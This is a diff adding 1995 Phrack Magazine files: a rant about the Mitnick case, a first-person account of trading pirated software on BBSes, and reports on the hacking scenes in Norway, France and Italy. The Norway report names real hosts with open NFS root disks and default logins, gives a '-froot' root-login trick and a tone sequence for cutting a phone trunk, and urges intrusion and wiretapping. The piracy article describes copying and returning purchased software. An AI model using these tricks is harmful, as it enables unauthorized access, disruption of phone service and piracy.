+   perhaps the person you might be talking to really isn't a 22 year old
+   Israeli student.  Maybe he really is a 40 year old Mossad Katsa working
+   in their computer center.  Was Mitnick Jewish?  Would he do "whatever
+   it takes to help the plight of Jews worldwide?"  Could he have been
+   approached to become one of the scores of sayanim worldwide?  Sure.
+   But probably not.  He'd be too hard to call on for the favors when they
+   would be needed by Mossad agents.  So, I have some doubts about this.
+
+Less than a month after the whole bust went down, Markoff and Tsutomo
+signed with Miramax Films to produce a film and multimedia project
+based on their hunt for Mitnick.  The deal reportedly went for
+$750,000.  That is a fuckload of money.  Markoff also gets to do a book,
+which in turn will become the screenplay for the movie.  (Tsutomo
+commented that he went with Miramax "based on their track record."
+Whatever the fuck that means.)
+
+Less than a month and they are signed.
+
+Looks to me like our duo planned for all this.
+
+"Hey Tsutomo, you know, if you went after this joker, I could write a book
+about your exploits!  We stand to make a pretty penny.  It would be
+bigger than the Cuckoo's egg!"
+
+"You know John, that's a damn good idea.  Let me see what I can find.
+Call your agent now, and let's get the ball rolling."
+
+"I'll call him right now, but first let me write this little story to
+recapture the interest of the public in the whole Mitnick saga.  Once that
+runs, they publishers are sure to bite."
+
+Meanwhile Mitnick becomes the fall guy for the world's ills, and
+two guys methodically formulate a plot to get rich.  It worked!
+
+Way to go, guys.
+
+
+
diff --git a/phrack47/20.txt b/phrack47/20.txt
new file mode 100644
index 0000000..03e393e
--- /dev/null
+++ b/phrack47/20.txt
@@ -0,0 +1,241 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 20 of 22
+
+
+                    A Day In The Life Of A Warez Broker
+                                Xxxx Xxxxxxxx
+                               414 - Area Code
+
+    I am a warez broker.  Why, you might ask.  Well because I take
+warez from one BBS to another and make credits along the way.  In case
+you're not familiar with the term, "Warez" or "ELiTE", let me fill you in.
+
+    Warez - are files that are protected by the US Government via
+copyright laws, and are not allowed to be used unless purchased.  This
+would include most programs you can buy at your local Best Buy,
+CompUSA, or EggHead Software.  They are files that you should _not_,
+and I repeat _not_ give to a friend, even if it is for a backup copy in case
+your house burns down, and his doesn't.
+
+    Alias: Warezzzzzzz, PHiLES, Wares, The Motts (just kidding)
+
+    ELiTE - is a status.  Above the rest, or in this case, below the rest.
+You are ELiTE if you transfer large amounts of files over some distance,
+whether it's with a disk, or phone line, ISDN line, or Internet.  Who cares
+what the medium, you just must transfer more than one program. No little
+kiddie, since you are 13 and you got a friend to give you a copy of DOS
+5.0 and Windows 3.0, you are not ELiTE, and Super Nintendo cartridges
+don't count!
+
+    Alias: 3l33t, PRiVaTe.
+
+    How do you become ELiTE?  YOU DON'T!  You are asked.  I am
+so sick of people hopping on perfectly legit boards asking for ELiTE.  It is
+such a pain in the ass!  You aren't going to get ELiTE if you ask for it on
+an ELiTE board.
+
+    But enough of a little background.  For those of you that are still a
+little cloudy as to what exactly ELiTE is, why don't you go read the next
+section of Phrack.  Let's move on......
+
+    A day in the life of a Warez Broker is very interesting.  And can be
+very exciting.  Most things are time dependent.  Being as credits are the
+exchange for being the first uploader, it is important to get the files first,
+clean them up first, and upload them first.
+
+    I do not belong to a Group.  There are many out there, but I have
+not joined any as being public is the best way to get caught.  Instead,
+myself and a bunch of some very loyal friends all funnel their Warez
+through me.  Since I am one of the only ones with a real job (8-5), I
+spend many evenings and nights uploading filez that my friends have made
+available for me on my private BBS.
+
+    It didn't start like that though.  It started as a competition
+between my friends.  At some point they were no longer excited with getting
+the new Warez, and I seemed to have the most time.  Now we all talk back
+and forth often, and we all have our purposes:
+
+    (names have been changed to protect the defendants)
+
+    >The Cringer - He takes the files off the internet.  Actually both
+The Cringer and I take them off the Internet, but he seems to always come up
+with the lists of site to go to.  And they normally are REALLY good.
+    >Raxstallion - He tests all the games.  For some reason he is really
+good at games, and can always find the bugs so we can give an honest
+report on the game.  I think he's so good because he doesn't work and
+never goes to class (just look at his check book and report card)
+    >Captian of The Ship - He just whines about how he never gets any
+women, and he also sez "Cool game Raxstallion" a lot.
+    >Dirt Sleasel - He gets us some technical background.
+    >Myself - I take care of all the uploading/downloading of files.  If
+one of my boys need a new program, I get it.  If they get a new file, they
+forward it to me so I can upload it.
+
+    Now most days are as simple as just checking all the local boards and
+making sure their aren't any new files to move around.  If there are new
+files, I download them, then turn around and upload them somewhere
+else.  Since most of the boards in my A/C are WWIV, they all have 3:1
+upload ratios.  Which means that for every meg of files I upload, I get to
+download 3 meg.  It's kinda nice, because as I move files from one BBS
+to another, I am making credits.  I haven't been doing this long, but for
+the length of time I have, I now have enough credits where I don't have to
+worry about too many files.  Normally now-a-days I will upload big
+programs like Windows NT, or Windows 95 releases.
+
+    Like I said before, we do a lot of internet stuff.  If The Cringer
+gets a new program, he will upload it to my board, then I take it from there.
+Some nites I am up late on the internet myself, but normally I do mass
+uploads before I hit the sack.  Sometimes, if it's a hot file, I will upload
+the program , and get up late to upload to another board.
+
+    Since the file transferring is such a big part of my life, I have a
+second phone line.  Maybe this isn't a big deal for someone in a major
+city, but in my A/C it is.  Many people don't have 2 phone lines in their
+house unless they have a fax machine, but in the age of communications,
+it seems as though I sometimes need 3 phone lines.  When someone is
+uploading, and I need to get on the modem it's a pain in the ass.
+
+    There are quite a few extra files inside of the zip files that are used
+to compress the disks that a program is distributed on.  A pretty popular
+file is the FILE_ID.DIZ file.  This file contains the description of the
+compressed file.  It is nice to include these files since many people don't
+type in a decent description on the description line.
+
+    ----  Example file_id.diz files (names changed to protect the defendants)
+
+Media Shop v1.0
+This is a 650$ program.
+You can make the best animation
+for Windows with this.
+Disk 1 of 5
+
+       ----    X X X x   '95    ----
+       ----  The Xxxxxx Xxxxx  ----
+
+
+        ----  End of Example of *.nfo file
+
+    You can see how in this example.  The name of the file is there and
+it also let's you know the total number of disks which helps you make sure you
+sis get all the downloads needed.  These file_id.diz files can normally be
+viewed on a bbs, for example, these are the default "extended descriptions"
+for WWIV BBS's.
+
+
+    The other files normally included are .NFO files.  Normally named
+by group, these files advertise for a crack house, or a distribution house.
+
+    ----  Example *.nfo files (names changed to protect the defendants)
+
+
+                     Ŀ
+               ͵ Xxxxxx Xxxxxxx of Xxxxxxx Presents 
+                     
+
+ Ϳ
+ Date:      Oct 09, 93 
+ Ϳ
+ Software:  Sourcer 5.10 *REGISTERED 100%*         
+ Ĵ
+ Publisher: ????                                   
+ Ĵ
+ Member:    SoNiC (R) -AV                          
+ 
+
+ Ŀ
+  Sorry... but now it's really REGISTERED...                                
+                                                                            
+  1st. Entpack the original SOURCER-Files                                   
+  2rd. Run SR510UTG.COM                                                     
+  3nd. Run SR.EXE and enter the following serno: XXXXXXX-XXXX               
+                                                                            
+ 
+
+ Ŀ
+  -=* Xxxxxx Xxxxxxx of Xxxxxxx *=-                                         
+ Ĵ
+  Members:   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx   
+             xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx     
+             xxxxxxxxxxxxxxxxx                                              
+ Ĵ
+  Courier:   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx   
+             xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx                 
+ Ĵ
+  xxxxxxxxxxxxx         ...-...-....   Xxx Xxxxxx      6 Nodes   World   HQ 
+  xxxxxxxxxxxxx         ...-...-....   Xxx Xxxxxxxx    9 Nodes   Europe  HQ 
+  xxxxxxxxxxx           ...-...-....   Xxx Xxxxxxx     2 Nodes   West    HQ 
+  xxxxxxxxxxxxxx        ...-...-....   Xxxx Xxxxx      3 Nodes   East    HQ 
+  xxxxxxxxxxxxxxxxxxxxx ...-...-....   Xxxxx           3 Nodes   Dist Site  
+  xxxxxxxxxxxx          ...-...-....   Xxxxxxxx        4 Nodes   Dist Site  
+  xxxxxxxxxxxxxx        818-xxx-xxxx   Xxxxxxxxx       1 Node    Dist Site  
+ Ĵ
+        If you want to contact us call one of these fine BBS and leave      
+                      a mail to The Xxxxxxxx or Xxxxxxxxxx                  
+ 
+
+    ----  End of Example of *.nfo file
+
+    You can see in this example how they not only name their members, but
+also the couriers.  These couriers make sure that the crack house's files
+get distributed.  The members help crack and get the files ready for the
+couriers.
+
+    For example, let's say there is a group called Slimers, they might
+include a .NFO called SLIMERS.NFO.  Sometimes these files give you
+a little insight on the group, but most times they say "Hi" to the people
+in their groups, and sometimes even a little about the group.  Normally
+they include x'ed out phone numbers to the group's BBS.
+
+    How do these files get out there?  Well I have many theories.  One is
+that someone buys the stuff and then uploads them to the group.  We
+sometimes buy the programs, if they aren't out there, and then copy them
+and re-shrinkwrap the file before returning the whole program.
+Sometimes, even the makers of the games leak the program before it is
+released.  This is what seems to have happened with Doom II.
+
+    Most boards these days are running at 28.8Kbps.  There are still a
+few running 14.4Kbps lines to give those that have a slower modem a
+place to call in without having to tie up the faster lines.  I'm sure with
+the onslaught of CDROM's becoming more popular in the program world, the
+amount of warez piracy will diminish for a while.  But some day I'm sure
+that there will be a new way to get a hold of the new programs.
+
+    As soon as the price of CDROM-R (worm) drives come down, there
+will be more transfer of total CD programs.  I guess that the 600 meg
+files will take a little longer to transfer.  I think someone should redesign
+their board so that a person may download a large file, or at least part of a
+large file, so they can use their time online to download parts of the
+CDROM.  We'll see, that talk is just starting to begin.
+
+    The ELiTE Community is very secretive, and very secure.  No one is
+let in, and once you're in, you're not expected to leave.  There is a
+lot of trust built in The Community.  The only way to get into The ELiTE
+Community is to know someone who is willing to vouch for you.
+Without someone to speak of your credibility, you will get no where.
+Once you are in and have established yourself, you can pretty much speak
+for yourself, or get a sysop to refer you.
+
+    The nice thing about being in the ELiTE Community is you never
+really get to meet anyone in person.  Heck, you might never even talk to a
+person in voice.  Things are so secretive, a lot of times you don't even
+know where you are calling.  If you do meet someone, though, normally people
+are so generous to their own.  It's like a close family.  It's nice to
+have that kind of closeness.  You have students, programmers, computer
+hobbyists, newbies, kiddies, those with bedtimes, those that never go to
+bed, and still those that sit back and just take it all in.
+
+    I have many friend that have an idea of what I do, but I will rarely
+refer a friend, even if I know they're cool.  It's not a good idea for
+everyone to know.  Whether I can trust a friend or not, I don't think it's a
+good idea to get them involved.  Things are dangerous, and you are
+better off looking for what they want, and uploading what they give you.
+
+    Hopefully in my next article I can give you some specifics regarding
+getting filez from the internet, or how to get in touch with the ELiTE
+Community in your A/C.  Until then, remember, there are more ELiTE
+boards than there are not.  For those boards that are not ELiTE, thanks for
+the distraction from the ELiTE boards, and sorry for all the heat!
+
+Secretly yours,
+        Xxxx Xxxxxxxx
diff --git a/phrack47/21.txt b/phrack47/21.txt
new file mode 100644
index 0000000..3824289
--- /dev/null
+++ b/phrack47/21.txt
@@ -0,0 +1,755 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 21 of 22
+
+****************************************************************************
+
+                             International Scenes
+
+There was once a time when hackers were basically isolated.  It was
+almost unheard of to run into hackers from countries other than the
+United States.  Then in the mid 1980's thanks largely to the
+existence of chat systems accessible through X.25 networks like
+Altger, tchh and QSD, hackers world-wide began to run into each other.
+They began to talk, trade information, and learn from each other.
+Separate and diverse subcultures began to merge into one collective
+scene and has brought us the hacking subculture we know today.  A
+subculture that knows no borders, one whose denizens share the common goal
+of liberating information from its corporate shackles.
+
+With the incredible proliferation of the Internet around the globe, this
+group is growing by leaps and bounds.  With this in mind, we want to help
+further unite the communities in various countries by shedding light
+onto the hacking scenes that exist there.  If you want to contribute a
+file about the hacking scene in your country, please send it to us
+at phrack@well.com.
+
+This month we have files about the scenes in Norway, France, Italy and an
+update from Denmark.
+
+------------------------------------------------------------------------------
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+dfp-1   An orientation on the Norwegian hacking/phreaking scene    dfp-1
+
+       Written by the Digital Freedom Phanatic (dfp@powertech.no)
+                    Brought to you in January, 1995
+- - - - - - - - - - - - - - - - -  - - - - - - - - - - - - - - - - - - -
+
+PROLOGUE: It's 1995 and little has been mentioned about Norwegian
+hackers in the media lately.  I thought this would be a nice opportunity
+to summarize some of the things that have happened on the scene in
+Norway during the last 5 or so years.  For those of you in the Norwegian
+audience not recognizing my name; you shouldn't.  I am more or less an
+acquaintance of many of you guys, but I feel that in order to get
+something done on the Norwegian scene right now (it's been fairly quiet
+for a while, nicht wahr?) I cannot reveal my true identity.  Hell, let's
+see if I get any responses to this article.  Now for the good stuff...
+
+Unfortunately I entered the scene as late as around 1990, so I'm not
+quite up-to-date on stuff that happened before that.  I've been trying
+to gather old articles from newspapers and books.  What I have been
+able to come up with is more or less some articles about a couple of
+hackers who managed to get into a local newspaper's computer.  Also,
+I have gotten in touch with some of the _real old Norwegian hackers_
+dating back to the '70s.  Needless to say, those people today work in
+the telecommunications industry.
+
+AREAS OF INTEREST FOR HACKERS: First, a little introduction to Norway.
+We are a very, very rich country, mainly due to the enormous amount of
+oil resources which we are pumping from the North Sea.  As a result of
+this wealth (I guess), our people are well educated and we have a blooming
+industry.  Well, in some cases.  Nevermind.  Keywords: large corporations,
+very large and respected telecommunications semi-monopoly, expensive
+communications.
+
+So in theory, there should be a lot of corporate hacking taking place in
+Norway.  Well, either the people doing this are doing it real well, or
+nobody is doing it.  I don't think anybody is.  As I have come to
+understand, most hacking in Norway has really been Internet related.
+Norway was actually one of the first countries apart from USA getting
+connected to the Internet; way back in 1982.
+
+STATUS OF INTERNET CONNECTIVITY: The universities have been hooked up
+since the dawn of time, and today these are the centers of the Internet
+community and high-speed telecom equipment in general use in Norway.
+Actually, we have four universities and at least three of them are
+currently networked with each other at a speed of 34Mbps.  The
+university network's (Uninett) international Internet connection is
+through NORDUnet and has a bandwidth of 2Mbps. Until a couple of
+years ago, one could not gain legitimate access to the Internet except
+by obtaining an account on one of the Uninett connected machines.  This
+was impossible, at least for a majority of the hacker community, so
+Uninett, or rather the computers at the University of Oslo, became a Mecca
+for the scene.  The big people had accounts there, or borrowed one.
+However, security is pretty stiff there and I fear that there was little
+actual _hacking_ going on, people were merely borrowing legitimate
+accounts through friends.
+
+What's fun about the University of Oslo computer network is that it
+until recently could be used for dialling out with speeds up to
+14.4kbps. Actually, some of their dialup terminal servers were
+configured to let you connect into them and dial out.  Try CONNECT
+USEk.15 after logging in to Net/ONE (the University LAN).  I don't think
+this works anymore, nor do I know if this was a "feature" introduced
+when the terminal servers were installed.  It could be that some hacker
+reconfigured them.  In that case, please let me know!  Dialled 820s
+as well (The 900 numbers of Norway).
+
+Today the Internet situation is very different.  We have had an
+extravagant boost in the number of Internet access providers lately:
+Oslonett, PowerTech, EUnet, Vestnett, BigBlue, MoNet, NordNet and PMDData
+are those I can think of right now.  Also, a number of companies are
+providing leased-line access: TelePost, EUnet and Datametrix.  PowerTech
+is starting to do this soon now (they say), presumably with competitive
+prices, but they are real bad on bandwidth.  (Well, they've been the
+cheapest for me so far.)  At least we're not far from getting Internet
+trial accounts shovelled up our asses here.  Let's hope some souls will
+soon pour some actual value into the net; more information, more
+services. I've seen little of that.
+
+Until we get more Norwegian fun services on the Net, we might as well
+exploit the services of Norwegian companies with no clue whatsoever when
+it comes to security.  Take, for instance, Cinet AS (cinet.no) which has
+a world NFS mountable root disk (rw). BigBlue Systems AS (bigblue.no) uses
+a Linux server which you can log to using accounts named node1, node2 or
+node3.  Full shell user access.  Or you could try logging in as "-froot"
+to obtain root access.  Hm, I think they plugged that. :)  Well, ach so.
+There's more out there.  Just get hacking.  And feel free to tell me what
+you find!
+
+WHAT WERE THE HACKERS DOING: There used to be a blooming hacking scene
+in Norway earlier.  Well, one might not say blooming with bright ideas
+and happenings, but at least there were many people doing the right
+stuff.  Using X.25 NUIs to get to QSD, Password spoofing at the local
+DataPak PAD using Pad2Pad, Social Engineering, Hacking calling cards to
+get to the states, finding AT&T Alliance backdoors so as to keep people
+up all night long when there was school the day after..  The good old
+days.  We could even do easy blueboxing.  1980s-1992.
+
+I must admit, though, that QSD isn't much anymore.  I liked it better
+when there were a hundred people logged in simultaneously, and when
+there were alliances being held with people from the States, Norway,
+Denmark, Israel, all over the place.  Then came the busts.  It was
+around October 1992 when the first busts started taking place.  We have
+a very interesting timeline there.  First, the police teamed up with a
+couple of computer software retailers (BJ Electronics, sounds familiar
+huh?) and busted ten or so of the warez type board sysops.  People to
+remember: Gizmo, Enemy :-).
+
+Soon after that, bigger names were taken down.  Mario, Graham Two
+(Vishnu), Edison, RamJet, Peter, Leikarnes etc.  Kevin was never busted.
+I wonder who he was.  These guys were taken for more serious stuff like
+carding, datapak (x.25), AT&T Alliance conferences, boxing, and general
+abuse of the telephone system.  A couple of shorter raid periods followed
+in 1993, and the scene was pretty much dead - except for the k-rad warez
+kids.
+
+AT&T and the other big guys we used to bluebox off of have all gone for
+CCIS/CCITT #7 so there is little to be done boxing in Norway now.  Well,
+as a matter of fact I haven't checked that out lately.  An interesting
+thing, though, is that you can temporarily disconnect the complete
+international trunk set between Norway and Iceland by breaking (24+26
+250ms 26 100ms) on the Iceland Direct line.  Everybody trying to
+_legitimately_ dial an Icelandic number from Norway for a while after
+that just gets a busy signal.  Ha ha.  Poor man's fun.  Wish I could do
+that with the States... :)
+
+WHAT'S AHEAD FOR THE NORWEGIAN SCENE: I think we should get organized. I
+have a few projects in mind.  There are a lot of security flaws and
+weaknesses yet to be discovered in Norwegian systems and services.  We
+need to get all of Norway scanned for automated answering services and
+carriers.  We need to get into some Central Offices to check out the
+labels on the modems connected to their Ericsson boxes.  We need to get
+trashing.  We need to start talking hacking and phreaking at The
+Gathering.  We need to find data numbers for C.O.s, banks, corporate
+computers, the local McDonalds', we need to get root access at an Internet
+provider and we need to be able to listen in to phone conversations.  We
+will.  Get in touch with me if you'd like to join.
+
+These were just a couple of thoughts of mine that I wanted to share with
+you fellow hackers out there.  Hope you've enjoyed them.  And for heaven's
+sake, feel free to give me some feedback (via internet: dfp@powertech.no).
+
+FUN FACTS: Many companies have unconfigured PBXes that you can obtain
+outside dialtone on.  There is no flat rate telephony.  A 28k8 modem
+goes for a little less than $400.  All phone calls are logged, logs are
+erased after a couple of months (presumably).  Only ISDN customers can
+get Caller ID.  There are three cellular operator companies.  All the
+Norway Direct operators are situated in Kongens gate 21, OSLO, Norway.
+The NMT-900 Cellular network doesn't allow calls to Pakistan.  All
+Norwegian babes are young, slim and blonde...not :)
+
+I'll be releasing a couple of files on Norwegian hacking/phreaking areas
+and techniques in the months to come.  Here's a list of those I am
+planning, haven't written anything yet but I think I will.  If there's
+anything in particular you'd like to add or to get hurried up, or if you
+have information which should be included in these files, then get in
+touch with me.
+
+  (*) COCOTs and Monopoly operated Pay Phones in Norway
+  (*) MBBS, the Norwegian BBS System; Backdoors and Security
+  (*) Norwegian Telecom; TeleNor.  Organization and computer systems.
+  (*) The Norwegian State Libraries; BibSys network security
+  (*) Telephone Monopoly; current status, what will happen, when?
+
+Sincerely Yours,
+  Digital Freedom Phanatic
+
+Yola's to (unsorted, people I know or would like to know):
+  Gizmo, Enemy, Mario, Graham Two (Vishnu), Edison, Roger RamJet, Peter,
+  Gekko, Ozelot, Sicko, Flesaker, Karstad, Arild Leikarnes, Frode1 og
+  Frode2 :-), The Dealer, Saron, Digital Phanatic, SCSI (BayernPower!),
+  SevenUp (damiano?), UrbanMatrix, OnkelD.  Where ARE you guys hiding?
+  ;-)
+
+
+------------------------------------------------------------------------------
+
+
+    >-=-=-=-=-=-<
+   <French  Scene>
+    >-=-=-=-=-=-<
+
+    By  NeurAlien
+
+The French scene has always been portrayed as weak by both French and
+foreign people.  There's a paradox here:  France was one of the first
+countries to develop a modern network (in 1981) YET there have been
+few _good hackers_.  How is that explained?  I DUNNO !
+
+In fact, stating that France is underdeveloped at a hacker level is
+partly false.  In France, hackers have always been isolated or hidden
+in little isolated groups.  Whenever a good group formed, everyone was
+quickly busted by DST (the agency in charge of computer fraud).  Moreover,
+this agency (DST) is somewhat effective and hacking has been illegal here
+since 1988.  The risks when you are caught are VERY HEAVY and the trial
+lasts forever!  Usually, it takes 3 years to go to trial and the material
+is ALWAYS seized even if you're not charged with anything!.
+
+The Videotex initiative that provided France such a breakthrough
+in technology is now an handicap because it can't follow the evolution of
+modems and isn't well adapted for networking with the Internet.
+
+I- The Videotex aka Minitel
+   ------------------------
+
+Minitel has been developed in 1981 by France Telecom.  It was excellent at
+the time but it hasn't evolved very much.  Let's see what hacking has
+been like in the Minitel world.
+
+To explain a little what "Minitel hacking" was, I must detail
+a little how Teletel (the network that supports Minitel) works.
+Teletel is based on X25 and provides multiple price levels:
+
+Teletel 0 (T0) is free for the user, costs a lot for the server.
+Teletel 1 (T1) costs a local call to the user, the price of the X25
+collect connection to the server.
+Teletel 2 (T2) costs the price of a local call + X25 communication
+(6+ cents per minute) to the user.)
+Teletel 3 (T3) costs T2 + a charge that is reversed to the server
+(costs 20 cents to $1 per minute to the user.)
+
+A lot of servers are accessible only in T3 for the users.
+The principle of hacking Teletel was to find a the X25 number corresponding
+to the T3 CODE in order to log on the T3 server from T2 level.
+Eventually, there could be a password on the T2 access.
+
+Actually, it's very basic and very dumb hacking since you can only do
+some scanning to find the x25 number of the servers.
+
+T1 was used for more professional type servers and the hackers
+that used to hack T1 were better than T2 hackers.
+
+T2 K0d3z were very popular among wannabe hackers, some Special Interest
+Groups about T2 were formed on a lot of servers and there was even a server
+dedicated to T2 codes.  The quality of information has always been extremely
+low in this kind of club.  Moreover, the kind of k0dez kidz on these SIGs and
+servers were particularly dumb (sorry for them).  It got really bad in 1991
+when a lot of T2 guys started to flame each other, accusing them of leeching
+some T2 codes from one server and posting them to another, saying that the
+other guys were ripping everyone off etc...   It may be continuing now but I'm
+totally uninterested by these people so I completely left this scene.
+
+The "good ones" of the T2 K0d3z k1dz stopped T2 (it's not free so it's
+too expensive!).  They usually started to Hack T0 which is totally free.
+(it's like a 1-800 for Teletel).  The servers of T0 are nearly all of the
+"restricted access" kind.  But they have weak protection schemes and can
+be easily bypassed with some experience.  The hackers of T0 servers don't
+usually know each other and some of them may form a kind of little "islands".
+(I'm calling them "islands" because it is always placed in an Information
+System on T0, deep within the system.  There are perhaps 10 or so "islands"
+that have no connection with other hackers.  A typical "island" consists of
+5 to 10 hackers.  Some hackers may go on 2 or more "islands" but prefer to
+keep the presence of both "islands" secret. Why? In order not to destroy
+both if one of them is found and shut down!
+
+One reason most never heard of these person is that there is nearly
+no connection between the Teletel world and the Internet. The only way
+to escape to Internet and Intl X25 is Teletel 1 (T1).
+
+II- When Teletel goes professional
+    -------------------------------
+
+As I said, the T1 is the only way for a Teletel hacker to evolve
+to hacking Internet or International & ASCII X25.  On Teletel 1, you can
+sometimes log on to some interesting Unixes, Vaxes etc.
+T1 is also the only way on Teletel to use the International X25 network.
+You have to get a Transpac NUI to call a foreign address from T1.
+Until 1991, the Transpac NUIs were a 4 to 6 random alphanumeric
+characters.  A man called IER had made an NUI Scanner that allowed him to
+find NUIs by scanning out every 4 character NUI.  It WAS effective,
+but Transpac changed to a 6 character NUI.  (IER was busted and caught.
+No news from him since that day!)
+
+Many good hackers used T1 a lot to hack systems and to go on the Internet
+and the Intl X25 networks.  For example, you may have heard of people
+like Netlink, Furax, Jansky or Synaps.  They hacked X25 and Internet but
+it seems that each of them was busted and caught.  Some are still alive on
+the Net, but some aren't!!!
+
+Some French hackers were really good but it seems that no one can hide
+very long from the DST.  They are very effective, and with the help of
+France Telecom, they trace back a lot of calls.
+
+Places like QSD haven't been used very much by the French because of
+their lack of technological knowledge. ahem...
+
+Moreover, QSD/The Line is tapped by governmental agencies so g00d French
+hackers don't like it.
+
+IV- The groups
+    ----------
+
+Some groups have been formed in France but they've never lived long enough
+to give new hackers the knowledge of the old hackers.  Some groups were:
+NICK, Hardcore Hackers, Piratel, TeKila Underground.  Many of them
+were hacking systems in Teletel 1.
+
+A group called CCCF appeared in 1991.  It was founded by Jean Bernard
+Condat and in fact it was not really a group.  This guy, JBC, is deft
+at maneuvering people into doing what he wants.  He organized fake contests
+like "The price of the Chaos" to get more information and then act as
+if he personally discovered the hacks that were given to him.
+
+He recently started the Chaos newsletter where nothing originates from
+him...it's taken from everywhere and from his personal contacts.
+
+He has big power because he works for SVP which is a private
+information company that has the goal of providing information to whoever
+wants it, for a large amount of money.
+
+Nobody knows what JBC really wants but he is definitely a threat to the
+underground.  Somebody, I don't recall who, already mentioned that in Phrack.
+
+V- Phreaking in Phrance
+   --------------------
+
+Phone phreaking became really active in France in 1992 after the
+massive release of a blue box that worked in France.  Several months
+later discovery of this caused the death of blue boxing from France.
+
+The blue box program was running on ST and several people that used it
+formed the TeKila Underground.  As far as i know, this was an happy group
+that had a lot of parties and liked smoking... :)
+
+They weren't very effective: just into using the blue box.
+
+Then came the movement of the "Horlogers", it was due to the credit you
+could gain if you connected in Teletel 3 on some server.  The "horlogers" were
+staying HOURS and DAYS on a server with blue box just to have more credit
+(counted in minute of connection) on those server.
+They were staying connected on a place called "L'horloge" (the timer) that
+enabled you not to be disconnected by the server when being idle for a long
+time.
+
+Blue boxing is now very hard in France.  The Australian blue box
+ceased to work and a lot of phreakers couldn't phreak anymore.
+
+The real problem in France is that nobody (or almost nobody) knows how
+the France Telecom phone network works so we can't really use any flaws
+in this system.
+
+Calling cards have been heavily used in France, placing the country
+in the top ten consumers of stolen CC's.  When AT&T & MCI saw that,
+they contacted France Telecom and now each calling card from AT&T, MCI
+can't call back to France.
+
+Moreover, FT's CC called "Carte France Telecom" (CFT or CP) is traced and
+recorded: I mean, when the person who owns the CFT receives the bill,
+written on the bill is the number of the caller and of the called party.
+
+HARD isn't it?
+
+Recently, some busts were done on AT&T and MCI CC users.  They are now
+awaiting trial.
+
+VI- Magazines
+    ---------
+
+Back before 1990 a magazine was published twice and sent to every
+single university in France. It was called "Hackito" from the
+"Hackito ergo sum" motto.  (I've never found an issue of it, but if you have
+one, send me it to me in email.)
+
+There is also this shitty zine called Chaos...
+
+
+Now, a new zine is making the underground react in France:
+It's called "N0 Way" and I'm the Editor.
+
+This magazine is written entirely in French. The current issue is number 3.
+Anyone wanting to submit something to "N0 Way" can send me a message in Email.
+
+Today we are seeing a lot of people in France wanting to know more about
+hacking.  It seems to have taken off here but not as much as in Holland or
+in the USA.
+
+Email me to receive "N0 Way": an133729@anon.penet.fi
+
+                                                        ++NeurAlien.
+
+------------------------------------------------------------------------------
+
+The Italian Scene
+by
+Zero Uno
+
+Italy, as you know, is among the industrialized EEC powers.  It deserves
+this honor only to the work of talented people, not by its government,
+which is utterly idiot and totally unable to fulfill the needs of the people.
+This characteristic inevitably has conditioned the whole telecommunication
+market, both phone and networks, which must make clever long term decisions,
+something that Italian government is not able to do.  The phone company is
+owned by the government through Italy Telecom (IT), the new society formed by
+the previous three state-owned firms involved in communications.  In the
+last five years IT has undoubtedly made good work, but the quality of phone
+connections and service was so bad in the past, that many people feel very
+upset when comes to talk to IT.
+
+The Telephone System
+
+Italy is divided in 220 telephone districts, each with its own unique
+prefix:  a zero followed by a number (up to three digits).  In addition there
+are a few special prefixes in order to access cellular phones (0335,0336) or
+to reach some 'fake' locations (0769), like many tv programs that use the
+telephone to reach people.  (Like 555 in the USA) In this way IT protects
+itself from line congestions when successful TV-progs are involved.  All
+kind of modern connections are availabl.  This means that payphones, pagers,
+cellulars (ETACS and GSM), radio (an old, now unsupported phone for cars in
+400 Mhz range) are present.  Another strange beast is televoting (0869) a fake
+prefix that holds the number of incoming calls for polls.  It was used to
+test some political decisions, but the hack here was so evident (the redial
+button) that now televote is not so well thought of.
+
+Standard Numbering
+
+The numbers that begins with the digit '1' are reserved for special services.
+This include all amenities like emergency numbers (113, roughly the equivalent
+of American 911), 187 (an all-but-everything number for all requests to IT,
+such ordering a new phone, installing a new line and so on) and toll free
+numbers 167[0 or 8] xxxxx.  As a reminder about IT's long term planning
+capacity, the toll free numbers started as 1678-xxxxx, but were so successful
+that IT was forced to add the 1670-xxxxx later |-(!  All 1678-7xxxx are in
+use by foreign phone companies, and heavily scanned |-).
+
+Some pretty numbers:
+
+  1678-72341   A promo for a XXX-rated line (in north or south america)
+  1678-70152   See the following capture
+
+---------------------------------- CAPTURE -------------------------------------
+
+                  OFFICIAL USE ONLY  
+          ͻ
+                                 FAMNET (sm)                     
+                      
+                                  AFAS HQ                        
+                                    and                          
+                                  AF FSCs                        
+                      
+          ͼ
+
+This system is for the use of authorized users ONLY. Individuals using this
+computer system without authority, or in access of their authority, are subject
+to having all of their activities on this system monitored and recorded by
+system personnel. In the course of monitoring individuals improperly using
+this system, or in the course of system maintenance, the activities of
+authorized users may also be monitored. Anyone using the system expressly
+consents to such monitoring and is advised that such monitoring reveals
+possible evidence of criminal activity, system personnel may provide the
+evidence of such monitoring to law enforcement officials.
+
+Line trace initialized...........................................
+
+We now have your phone number......WE TRACK HACKERS AND ADVISE AUTHORITIES.
+
+---------------------------- END OF CAPTURE --------------------------------
+
+Unfortunately IT does not support caller ID, so the last sentence is pure
+crap.
+
+The above numbers are (obviously) all public. These ones are 'reserved'
+for internal use, though many many people play with 'em:
+
+    135             BBS to record maintenance procedures
+    138             BBS or human operator (depend on districts)
+    1372            Ring-back
+    1391            Human operator
+    160             Security service (???)
+    1414            A yet-to-be-implemented service, that enables a user
+                    to use one phone and bill on their own phone the
+                    subsequent call. Will be implemented |-)?
+
+Not all districts support this, and since they are not public they can change
+rapidly.  Also present are the country direct numbers in the 1721xxx format.
+
+    Country         Code
+    -----------------------------
+    Argentina       054
+    Brazil          055
+    Chile           056
+    AT&T            011
+    MCI             022
+    Sprint          877
+
+Services Offered
+
+With the advent of digital COs, 'new' (new to the Italian market, anyway)
